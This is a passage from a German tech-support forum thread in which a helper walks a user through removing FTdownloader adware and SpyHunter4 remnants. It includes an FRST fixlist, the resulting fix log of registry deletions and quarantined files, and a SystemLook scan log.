C:\Program Files\Enigma Software Group
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Recent\FTdownloader V4.0.lnk
C:\Users\Moritz\AppData\Local\Cool_Mirage
C:\Program Files (x86)\FTDownloader.com
C:\Program Files (x86)\FTdownloader V4.0
C:\Windows\Tasks\FTdownloader V4.0-codedownloader.job
C:\Windows\Tasks\FTdownloader V4.0-enabler.job
C:\Windows\Tasks\FTdownloader V4.0-updater.job
Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
__________________ Logfiles bitte immer in CODE-Tags posten |
|
13.08.2013, 14:08
| #26 |
| | SpyHunter4 als Pc-Scanner... Wenn ich es auf dem Desktop speichere, findet FRST es nicht. Was / wo ist das Verzeich iss in dem sich FRST befindet? |
|
13.08.2013, 14:21
| #27 | |
| /// Winkelfunktion /// TB-Süch-Tiger™ | SpyHunter4 als Pc-Scanner...Zitat:
 Lad es neu runter auf den Desktop
__________________ Logfiles bitte immer in CODE-Tags posten |
|
13.08.2013, 14:36
| #28 |
| | SpyHunter4 als Pc-Scanner... ^^ Achso Code:
ATTFilter Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 13-08-2013
Ran by Moritz at 2013-08-13 15:34:47 Run:1
Running from C:\Users\Moritz\Desktop
Boot Mode: Normal
==============================================
========= REG DELETE "HKCU\Software\AppDataLow\Software\FTdownloader V4.0" /f =========
Der Vorgang wurde erfolgreich beendet.
========= End of Reg: =========
========= REG DELETE "HKLM\SOFTWARE\Classes\FTDownloader" /f =========
Der Vorgang wurde erfolgreich beendet.
========= End of Reg: =========
========= REG DELETE "HKLM\SOFTWARE\Microsoft\Tracing\FTDownloader_RASAPI32" /f =========
Der Vorgang wurde erfolgreich beendet.
========= End of Reg: =========
========= REG DELETE "HKLM\SOFTWARE\Microsoft\Tracing\FTDownloader_RASMANCS" /f =========
Der Vorgang wurde erfolgreich beendet.
========= End of Reg: =========
========= REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72894989-0776-4934-9248-8858C46BDD68}" /f =========
FEHLER: Zugriff verweigert
========= End of Reg: =========
========= REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C01CE44C-B492-48A0-8760-6C6E60580C32}" /f =========
FEHLER: Zugriff verweigert
========= End of Reg: =========
========= REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E7B37535-FC07-4795-8257-AA6905D9042B}" /f =========
FEHLER: Zugriff verweigert
========= End of Reg: =========
========= REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-codedownloader" /f =========
FEHLER: Zugriff verweigert
========= End of Reg: =========
========= REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-enabler" /f =========
FEHLER: Zugriff verweigert
========= End of Reg: =========
========= REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-updater" /f =========
FEHLER: Zugriff verweigert
========= End of Reg: =========
========= REG DELETE "HKLM\SOFTWARE\Wow6432Node\FTdownloader V4.0" /f =========
Der Vorgang wurde erfolgreich beendet.
========= End of Reg: =========
========= REG DELETE "HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\lgnbhdnimikkoodkogjlcllngimhlapp" /f =========
Der Vorgang wurde erfolgreich beendet.
========= End of Reg: =========
========= REG DELETE "HKU\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0" /f =========
FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.
========= End of Reg: =========
========= REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060" /f =========
FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.
========= End of Reg: =========
========= REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba" /f =========
FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.
========= End of Reg: =========
========= REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8" /f =========
FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.
========= End of Reg: =========
========= REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2" /f =========
FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.
========= End of Reg: =========
========= REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c" /f =========
FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.
========= End of Reg: =========
"C:\Program Files\Enigma Software Group" => File/Directory not found.
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Recent\FTdownloader V4.0.lnk => Moved successfully.
C:\Users\Moritz\AppData\Local\Cool_Mirage => Moved successfully.
"C:\Program Files (x86)\FTDownloader.com" => File/Directory not found.
C:\Program Files (x86)\FTdownloader V4.0 => Moved successfully.
C:\Windows\Tasks\FTdownloader V4.0-codedownloader.job => Moved successfully.
C:\Windows\Tasks\FTdownloader V4.0-enabler.job => Moved successfully.
C:\Windows\Tasks\FTdownloader V4.0-updater.job => Moved successfully.
==== End of Fixlog ====
|
|
13.08.2013, 14:48
| #29 |
| /// Winkelfunktion /// TB-Süch-Tiger™ | SpyHunter4 als Pc-Scanner... Sehr schön. Lade nochmal http://ryder.trojaner-board.de/spyhu...nterKiller.exe neu runter und führ diesen nochmal aus. Das Tool wurde eben erst aktualisiert. Danach nochmal Systemlook wie schon zuvor gemacht und das neue Log posten
__________________ Logfiles bitte immer in CODE-Tags posten |
|
13.08.2013, 15:02
| #30 |
| | SpyHunter4 als Pc-Scanner...Code:
ATTFilter SystemLook 30.07.11 by jpshortstuff
Log created at 16:00 on 13/08/2013 by Moritz
Administrator - Elevation successful
========== filefind ==========
Searching for "*FTdownloader*"
C:\FRST\Quarantine\FTdownloader V4.0-codedownloader.job --a---- 1226 bytes [12:16 26/07/2013] [12:37 13/08/2013] DDF661E8F32DD055D5C6C0A178711B02
C:\FRST\Quarantine\FTdownloader V4.0-enabler.job --a---- 1136 bytes [12:16 26/07/2013] [12:37 13/08/2013] F805BB31237EC183E3DE019756961A9E
C:\FRST\Quarantine\FTdownloader V4.0-updater.job --a---- 1232 bytes [12:16 26/07/2013] [12:37 13/08/2013] 33E221F47F84CA666E567C921A1C1B83
C:\FRST\Quarantine\FTdownloader V4.0.lnk --a---- 726 bytes [07:36 13/08/2013] [07:36 13/08/2013] 790AACB9534E01ABB21F1480C6D9A1B8
C:\FRST\Quarantine\FTdownloader V4.0\FTdownloader V4.0-buttonutil.dll --a---- 393216 bytes [12:16 26/07/2013] [12:16 26/07/2013] 079E87F2A760FC41C6A6767BCB87B5F2
C:\FRST\Quarantine\FTdownloader V4.0\FTdownloader V4.0-buttonutil.exe --a---- 338432 bytes [12:16 26/07/2013] [12:16 26/07/2013] BA25FC5D1BEDBE821F063D6956BEBA4D
C:\FRST\Quarantine\FTdownloader V4.0\FTdownloader V4.0-buttonutil64.dll --a---- 473088 bytes [12:16 26/07/2013] [12:16 26/07/2013] D2E25B7E08F1370BE1B649E96B33142F
C:\FRST\Quarantine\FTdownloader V4.0\FTdownloader V4.0-buttonutil64.exe --a---- 442880 bytes [12:16 26/07/2013] [12:16 26/07/2013] 2185767A2A7BCA1CD4570E0DCF6F9350
C:\FRST\Quarantine\FTdownloader V4.0\FTdownloader V4.0-helper.exe --a---- 311808 bytes [12:16 26/07/2013] [12:16 26/07/2013] 033E5078BCE5B537286E8E256C91D434
C:\FRST\Quarantine\FTdownloader V4.0\FTdownloader V4.0.ico --a---- 9662 bytes [11:19 30/06/2013] [11:19 30/06/2013] 0A8D41A2552E2FC0A5CCD4AEB106FBF2
C:\Windows\System32\Tasks\FTdownloader V4.0-codedownloader --a---- 4256 bytes [12:16 26/07/2013] [12:16 26/07/2013] 77F95681B9972C1DDE808B209EAC739B
C:\Windows\System32\Tasks\FTdownloader V4.0-enabler --a---- 4166 bytes [12:16 26/07/2013] [12:16 26/07/2013] 3C451D483016AB248AC0B8FBDB56E673
C:\Windows\System32\Tasks\FTdownloader V4.0-updater --a---- 4262 bytes [12:16 26/07/2013] [12:16 26/07/2013] A5216EE89CA0126CFBA1044B683DE65E
Searching for "*Spyhunter*"
C:\Windows\Prefetch\SPYHUNTER4.EXE-5B920D84.pf --a---- 165806 bytes [17:24 27/07/2013] [13:46 12/08/2013] 2F407C91D7454A65F9ED0F5947160ED8
========== folderfind ==========
Searching for "*FTdownloader*"
C:\FRST\Quarantine\FTdownloader V4.0 d------ [12:15 26/07/2013]
C:\FRST\Quarantine\Cool_Mirage\FTDownloader.exe_Url_srel2ybtny14zdfla5iaze4jen4lh3ou d------ [12:15 26/07/2013]
Searching for "*Spyhunter*"
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_997024d9eee954d58adce9df23e313ac85ddeb93_22397c02 d----c- [18:32 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_0874959b d----c- [18:13 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1494f3a1 d----c- [17:55 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1bab9981 d----c- [17:54 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_2286f8b0 d----c- [17:53 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_18795e35 d----c- [17:17 11/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1c84dcc7 d----c- [13:45 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1dd3228e d----c- [13:43 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1f3d257a d----c- [13:46 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f7779eb6f2bbcb0413114bc997390a421bbd6_22c92876 d----c- [15:10 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_19596652 d----c- [18:18 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_24c0d0e6 d----c- [18:13 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_cab_21004450 d----c- [17:54 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_997024d9eee954d58adce9df23e313ac85ddeb93_22397c02 d----c- [18:32 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_0874959b d----c- [18:13 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1494f3a1 d----c- [17:55 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1bab9981 d----c- [17:54 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_2286f8b0 d----c- [17:53 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_18795e35 d----c- [17:17 11/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1c84dcc7 d----c- [13:45 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1dd3228e d----c- [13:43 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1f3d257a d----c- [13:46 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f7779eb6f2bbcb0413114bc997390a421bbd6_22c92876 d----c- [15:10 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_19596652 d----c- [18:18 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_24c0d0e6 d----c- [18:13 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_cab_21004450 d----c- [17:54 07/08/2013]
========== regfind ==========
Searching for "FTdownloader"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72894989-0776-4934-9248-8858C46BDD68}]
"Path"="\FTdownloader V4.0-updater"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C01CE44C-B492-48A0-8760-6C6E60580C32}]
"Path"="\FTdownloader V4.0-enabler"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E7B37535-FC07-4795-8257-AA6905D9042B}]
"Path"="\FTdownloader V4.0-codedownloader"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-codedownloader]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-enabler]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-updater]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060}]
"AppName"="FTdownloader V4.0-buttonutil64.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba}]
"AppName"="FTdownloader V4.0-codedownloader.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8}]
"AppName"="FTdownloader V4.0-bg.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2}]
"AppName"="FTdownloader V4.0-buttonutil.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c}]
"AppName"="FTdownloader V4.0-helper.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
Searching for "Spyhunter"
[HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files\Enigma Software Group\SpyHunter\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files\Enigma Software Group\SpyHunter\Defs\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\"=""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\167ED423049710645A22436AA88D0A99]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\1F94163E4B8E8524AB2D208677C1C639]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\AutoCheckUpdate"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\21B3B2A547DD5C14583129BD7D54AE43]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\270D6EC2A97B99548BA1F764A91027A1]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\2BAC083D35096B44C91BE7BCF2A9BE35]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\325484F6157B534449A295F31E20CC49]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\EsgScanner.inf"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\3A1F744C14FB4E14A93C1628CDE36240]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorWinCom_remember"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\3B801397615ADA446AA0C0D27F8C35F5]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ShieldOnBoot"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\4EE16055EDFAB8E46BCE054F706E7050]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\5942B0FB3B0060E4FB3008F9D51CFC26]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\native.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\5A2C306FF7B069949928B69774A9C8A0]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\GuardStatus"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\64717EB28EB8ECA4A9584B6BA7934B83]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ActiveDesktop_remember"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\79455857BB467F24D81891AAD09F7079]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ESGScanner.sys"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\8014B476AFF7674499E83E22C791A5A2]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\8D95E4363DF07F44FB6986E629D65FDB]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ActHomePageProt"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\96F935B48BE0455459DB1E7E97E04BDF]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorDNS"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\9BDCF589B9440364E8DB3F9535DDBB9F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\Defman.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\B435C9AD1BF350D48BE80D5A79BA2EEE]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ESGRKCHK.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\B8759E73AEB287C4485B33F51B7DE868]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorIEImages"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\C2E30ACAB517FB744ACF4672E649BE7F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\Language"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\CA1A35F40F64E2C419551606C418D4C6]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\AutoUpdateDownload"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D23A4A6BB4BD7474197B486733BBB37A]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ShScanner.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D69C9067CD45885488F1E05319EDD023]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ExecutionGuard.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D75FE63EDA1D54A4CA6F51CADD11E656]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\CheckShOsCompatibility"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D91BE455A0889C4458F258847859EC6F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorHosts"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\DD372D2F4DF0D0540B2F37ED85511E4C]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorSystem"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\F87702C2D0F509E4FB7923DA78F44976]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\license.txt"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\FD27396ADF8235D449146899FD9100FE]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\Common.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Products\6BFC3EA82B8755F47AEB16F8FC4FA330\InstallProperties]
"InstallLocation"="C:\Program Files\Enigma Software Group\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Products\6BFC3EA82B8755F47AEB16F8FC4FA330\InstallProperties]
"DisplayName"="SpyHunter"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2ADE6BE8-2517-44DA-8E26-F013C9BE50A9}]
"Path"="\SpyHunter4Startup"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SpyHunter4Startup]
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"
Searching for " "
[HKEY_LOCAL_MACHINE\SOFTWARE\Dell Computer Corporation\SysInfo]
